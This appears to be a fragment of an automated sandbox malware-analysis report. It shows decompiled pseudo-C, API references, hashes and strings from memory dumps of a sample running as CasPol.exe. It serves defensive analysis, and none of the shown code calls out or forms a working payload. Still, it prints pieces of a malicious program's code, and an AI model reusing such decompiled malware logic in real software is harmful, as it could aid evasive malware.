													__ecx = __eax + _t60;
													__eax = E00420153(__esi,  *((intOrPtr*)(__ebx + 0x28)), __eax + _t60);
													__eax =  &_v656;
													_push( &_v656);
													__eax = E004191A3(); // executed
													__esp = __esp + 0x28;
													__edi = __edi;
													_pop(__esi);
													__ebx = 2;
													__esp = __ebp;
													__ebp = 0;
													return __eax;
												}
											}
										}
									} else {
										goto L12;
									}
								}
							}
						}
						goto L20;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L20:
			}

0x004099a7
0x004099a7
0x004099aa
0x00409933
0x00409938
0x00409943
0x0040995b
0x00409960
0x00409967
0x00409969
0x00409976
0x0040997a
0x0040999e
0x0040999e
0x0040997a
0x004099a6
0x004099ac
0x004099ac
0x004099b1
0x004099b1
0x004099b2
0x004099b3
0x004099b4
0x004099b6
0x004099bc
0x004099bd
0x004099be
0x004099bf
0x004099c7
0x004099ca
0x004099d7
0x004099dc
0x004099df
0x004099e5
0x004099ea
0x004099f2
0x004099fd
0x004099fd
0x00409a04
0x00409a13
0x00409a19
0x00409a1e
0x00409a2b
0x00409a35
0x00409a3d
0x00409a43
0x00409a45
0x00000000
0x00000000
0x00409a47
0x00409a4f
0x00409a69
0x00409a69
0x00409a6c
0x00409a6d
0x00409a70
0x00409a73
0x00000000
0x00409a75
0x00409a75
0x00000000
0x00409a75
0x00409a51
0x00409a51
0x00409a58
0x00000000
0x00409a5a
0x00409a5a
0x00409a61
0x00000000
0x00409a63
0x00409a63
0x00409a67
0x00409a83
0x00409a8b
0x00409a93
0x00409a98
0x00409aa0
0x00409aa0
0x00409aa8
0x00409ab0
0x00409ab2
0x00000000
0x00409ab4
0x00409ab4
0x00409aba
0x00409abd
0x00409ac3
0x00409ac6
0x00409acc
0x00409acc
0x00409ad3
0x00409ad5
0x00409ad8
0x00409ad8
0x00409adf
0x00409ae2
0x00409ae9
0x00409aef
0x00409af5
0x00409afb
0x00409b01
0x00409b07
0x00409b0d
0x00409b12
0x00409b17
0x00409b1d
0x00409b1f
0x00000000
0x00409b25
0x00409b25
0x00409b28
0x00409b28
0x00409b2f
0x00409b35
0x00409b3b
0x00409b41
0x00409b47
0x00409b53
0x00409b5b
0x00409b61
0x00409b67
0x00409b71
0x00409b79
0x00409b7f
0x00409b81
0x00000000
0x00409b87
0x00409b87
0x00409b8d
0x00409b8d
0x00409b93
0x00409ba0
0x00409ba2
0x00409ba6
0x00409bab
0x00409bae
0x00409bae
0x00409bb5
0x00409bbe
0x00409bc4
0x00409bc6
0x00409bcb
0x00409bce
0x00409bcf
0x00409bd0
0x00409bd1
0x00409bd3
0x00409bd4
0x00409bd4
0x00409b81
0x00409b1f
0x00000000
0x00000000
0x00000000
0x00409a67
0x00409a61
0x00409a58
0x00000000
0x00409a4f
0x00409a7a
0x00409a7b
0x00409a7c
0x00409a7c
0x00409a7e
0x00409a7f
0x00409a81
0x00409a82
0x00409a82
0x00000000

APIs

PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: da7c32538520bc46c9b883dd194686ad874100c3146dbe5130bb82354df0f293
Instruction ID: 648afeff1364fdba1a395c652430271767a4361657bae9f95ab056a44fdb6ef5
Opcode Fuzzy Hash: da7c32538520bc46c9b883dd194686ad874100c3146dbe5130bb82354df0f293
Instruction Fuzzy Hash: D201A7B2A4031476E6215651EC83FAF2358DB84B14F14412EFE04BA2C2D5EDAD0546E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E863 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041E863(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041e872
0x0041e87a
0x0041e890
0x0041e894

APIs

RtlAllocateHeap.NTDLL(00418C66,?,00419410,00419410,?,00418C66,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E890

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
Instruction ID: 141f3d952d026ec1b8dbe03c6c75eaaf96d710a32fd8771451468f3a68ee1817
Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
Instruction Fuzzy Hash: 60E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C630F914CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 004100C3 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E004100C3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}

0x004100dd
0x004100e7
0x004100ed
0x004100fc
0x004100ea
0x004100ea
0x004100ea

APIs

GetUserGeoID.KERNELBASE(00000010), ref: 004100ED

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: User
String ID:
API String ID: 765557111-0
Opcode ID: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
Instruction ID: d3a3e2032565f6d34a55456b5a80270182852c25dcf9d34bac0e0dafc7ea0ddc
Opcode Fuzzy Hash: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
Instruction Fuzzy Hash: 62E0C27378030467FA2091A59C42FBA364F5B84B00F048475F90CE62C2D5A8E8C00028

Uniqueness

Uniqueness Score: -1.00%

Function 0041E8A3 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0041E8D0

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
Instruction ID: 81649b4115f882acd630a205a6666d0b6fa7ed995dd6d0d074ea88b8b0e80a3e
Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
Instruction Fuzzy Hash: 1EE012B6600208ABCB14EF89DC49EA737ACAF88754F018059FE095B282C630E914CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041EA03 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041EA03(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F203( *((intOrPtr*)(_a4 + 0x6d4)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x6d4)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041ea1d
0x0041ea33
0x0041ea37

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA33

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
Instruction ID: 26638fb517edf30d6313ba082fa82f18f9a37f2b762b1a37e3fac1042cbd1374
Opcode Fuzzy Hash: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
Instruction Fuzzy Hash: 83E01AB56002086BC710DF89DC45EE737ADAF88654F014065FE0857242C635E8148BB5

Uniqueness

Uniqueness Score: -1.00%

Function 0041E8D7 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041E8D7(intOrPtr _a4, int _a8) {

				asm("adc eax, 0xbb2eba75");
				_t7 = _a4;
				E0041F203( *((intOrPtr*)(_a4 + 0x6d0)), _t7, _t7 + 0xaa8,  *((intOrPtr*)(_a4 + 0x6d0)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041e8d7
0x0041e8e6
0x0041e8fd
0x0041e90b

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E90B

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a5fb50388cdf821a489fea839f38f53be1195a719a8b2915b7934d74684e0527
Instruction ID: 5c0109bf3c017ec3e38722d5e3a7691f356bf1999787dbf9d42864a55b6ec0fa
Opcode Fuzzy Hash: a5fb50388cdf821a489fea839f38f53be1195a719a8b2915b7934d74684e0527
Instruction Fuzzy Hash: E3E08C36A00210BBCB209F85CC86FD737A8EF85690F1480A8B9595B341D278EA41C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0041E8E3 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E8E3(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F203( *((intOrPtr*)(_a4 + 0x6d0)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x6d0)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041e8e6
0x0041e8fd
0x0041e90b

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E90B

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 191224e0ceac810c9efb7ccbd1f96fb57d99ee79d09e325168da16ef873e870b
Instruction ID: b4e5e56741419d1f277733bd979a6942edbd6e735fed61574da432c381a3350b
Opcode Fuzzy Hash: 191224e0ceac810c9efb7ccbd1f96fb57d99ee79d09e325168da16ef873e870b
Instruction Fuzzy Hash: 34D0C232B002047BC620DF88CC45FD3379CDF44650F0080A5BA0C5B241C631BA00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E897 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0041E8D0

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
Instruction ID: 750e433a6b7849f822becc92f6b04cfcf815011e590c3758b4f193371c1a9ae6
Opcode Fuzzy Hash: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
Instruction Fuzzy Hash: 18E0C2B92083846FD700EF65C8408E77BA4EF89304714889EFCEA47202C331D86A8BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0161967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01619694

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3979ef137f87ae27ecf184962ab8c32796ee3ee8f99734d31c273164a96012c
Instruction ID: 3a1a3548b4a7b5b9322192fd16d64db6b37d4cc6e10512b96b71d7a2f11d165f
Opcode Fuzzy Hash: f3979ef137f87ae27ecf184962ab8c32796ee3ee8f99734d31c273164a96012c
Instruction Fuzzy Hash: FAB09B719015D5C5E615D7A44E08717790477D1755F26C451D2020751F4778C091F5F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0168B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0168B476
*** enter .cxr %p for the context, xrefs: 0168B50D
The critical section is owned by thread %p., xrefs: 0168B3B9
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0168B323
The resource is owned exclusively by thread %p, xrefs: 0168B374
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0168B47D
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0168B2F3
*** enter .exr %p for the exception record, xrefs: 0168B4F1
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0168B39B
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0168B305
write to, xrefs: 0168B4A6
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0168B3D6
The resource is owned shared by %d threads, xrefs: 0168B37E
*** Inpage error in %ws:%s, xrefs: 0168B418
a NULL pointer, xrefs: 0168B4E0
*** Resource timeout (%p) in %ws:%s, xrefs: 0168B352
Go determine why that thread has not released the critical section., xrefs: 0168B3C5
The instruction at %p referenced memory at %p., xrefs: 0168B432
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0168B2DC
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0168B53F
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0168B38F
*** An Access Violation occurred in %ws:%s, xrefs: 0168B48F
*** then kb to get the faulting stack, xrefs: 0168B51C
This failed because of error %Ix., xrefs: 0168B446
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0168B314
an invalid address, %p, xrefs: 0168B4CF
<unknown>, xrefs: 0168B27E, 0168B2D1, 0168B350, 0168B399, 0168B417, 0168B48E
read from, xrefs: 0168B4AD, 0168B4B2
The instruction at %p tried to %s , xrefs: 0168B4B6
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0168B484

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 745f4b799511ba6e25a1bce887ec3c9abb09af1349214c65c6da9041467a30f7
Instruction ID: 9b84fd83897da557ca14f7405d8489fbba8e0af1855b28cd776482d11e506a3c
Opcode Fuzzy Hash: 745f4b799511ba6e25a1bce887ec3c9abb09af1349214c65c6da9041467a30f7
Instruction Fuzzy Hash: 84810271A40200FFDB21AE8ACC56D7B3F3AFF56A91F00415CF5056F212D3698452CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 01691C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01691C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x15b48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015DB150();
				} else {
					E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x16c589c);
				E015DB150("Heap error detected at %p (heap handle %p)\n",  *0x16c58a0);
				_t27 =  *0x16c5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01691E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015DB150();
				} else {
					E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E015DB150("Error code: %d - %s\n",  *0x16c5898);
				_t113 =  *0x16c58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015DB150("Parameter1: %p\n",  *0x16c58a4);
				}
				_t115 =  *0x16c58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015DB150("Parameter2: %p\n",  *0x16c58a8);
				}
				_t117 =  *0x16c58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015DB150("Parameter3: %p\n",  *0x16c58ac);
				}
				_t119 =  *0x16c58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x16c58b4);
					E015DB150("Last known valid blocks: before - %p, after - %p\n",  *0x16c58b0);
				} else {
					_t120 =  *0x16c58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015DB150();
				} else {
					E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E015DB150("Stack trace available at %p\n", 0x16c58c0);
			}

0x01691c10
0x01691c16
0x01691c1e
0x01691c3d
0x01691c3e
0x01691c20
0x01691c35
0x01691c3a
0x01691c44
0x01691c55
0x01691c5a
0x01691c65
0x01691c67
0x00000000
0x01691c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01691c67
0x01691cdc
0x01691ce5
0x01691d04
0x01691d05
0x01691ce7
0x01691cfc
0x01691d01
0x01691d0b
0x01691d17
0x01691d1f
0x01691d25
0x01691d30
0x01691d4f
0x01691d50
0x01691d32
0x01691d47
0x01691d4c
0x01691d61
0x01691d67
0x01691d68
0x01691d6e
0x01691d79
0x01691d98
0x01691d99
0x01691d7b
0x01691d90
0x01691d95
0x01691daa
0x01691db0
0x01691db1
0x01691db7
0x01691dc2
0x01691de1
0x01691de2
0x01691dc4
0x01691dd9
0x01691dde
0x01691df3
0x01691df9
0x01691dfa
0x01691e00
0x01691e0a
0x01691e13
0x01691e32
0x01691e33
0x01691e15
0x01691e2a
0x01691e2f
0x01691e39
0x01691e4a
0x01691e02
0x01691e02
0x01691e08
0x00000000
0x00000000
0x01691e08
0x01691e5b
0x01691e7a
0x01691e7b
0x01691e5d
0x01691e72
0x01691e77
0x01691e95

Strings

heap_failure_block_not_busy, xrefs: 01691CA6
heap_failure_freelists_corruption, xrefs: 01691CC9
Parameter2: %p, xrefs: 01691DA5
heap_failure_buffer_underrun, xrefs: 01691C9F
HEAP[%wZ]: , xrefs: 01691C30, 01691CF7, 01691D42, 01691D8B, 01691DD4, 01691E25, 01691E6D
Stack trace available at %p, xrefs: 01691E86
heap_failure_invalid_argument, xrefs: 01691CAD
Parameter3: %p, xrefs: 01691DEE
heap_failure_internal, xrefs: 01691C6E
heap_failure_invalid_allocation_type, xrefs: 01691CB4
heap_failure_cross_heap_operation, xrefs: 01691CC2
Parameter1: %p, xrefs: 01691D5C
heap_failure_usage_after_free, xrefs: 01691CBB
heap_failure_unknown, xrefs: 01691C75
heap_failure_entry_corruption, xrefs: 01691C83
Last known valid blocks: before - %p, after - %p, xrefs: 01691E45
heap_failure_listentry_corruption, xrefs: 01691CD0
heap_failure_generic, xrefs: 01691C7C
HEAP: , xrefs: 01691C16, 01691C3D, 01691D04, 01691D4F, 01691D98, 01691DE1, 01691E32, 01691E7A
heap_failure_multiple_entries_corruption, xrefs: 01691C8A
heap_failure_lfh_bitmap_mismatch, xrefs: 01691CD7
Heap error detected at %p (heap handle %p), xrefs: 01691C50
heap_failure_virtual_block_corruption, xrefs: 01691C91
heap_failure_buffer_overrun, xrefs: 01691C98
Error code: %d - %s, xrefs: 01691D12

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 9be169d22a43006dfc8c63990eca867d93a3278a5aafe10dbaa05d392f78ddd0
Instruction ID: 42890cfcf86b7aab08cfe4bfa2519bec9ed78229446bd8dc03edc65ce6544feb
Opcode Fuzzy Hash: 9be169d22a43006dfc8c63990eca867d93a3278a5aafe10dbaa05d392f78ddd0
Instruction Fuzzy Hash: FA61E237651187DFDB21ABD9DC8693577F9FB02D31F2A802EF40A6F300D66899428B09

Uniqueness

Uniqueness Score: -1.00%

Function 015E3D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E015E3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E015E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E015E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E015E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E015E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E015E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L015F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0161F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01621370(_t276, 0x15b4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0161BB40(0,  &_v68, _t170);
									if(L015E43C0( &_v68,  &_v24) != 0) {
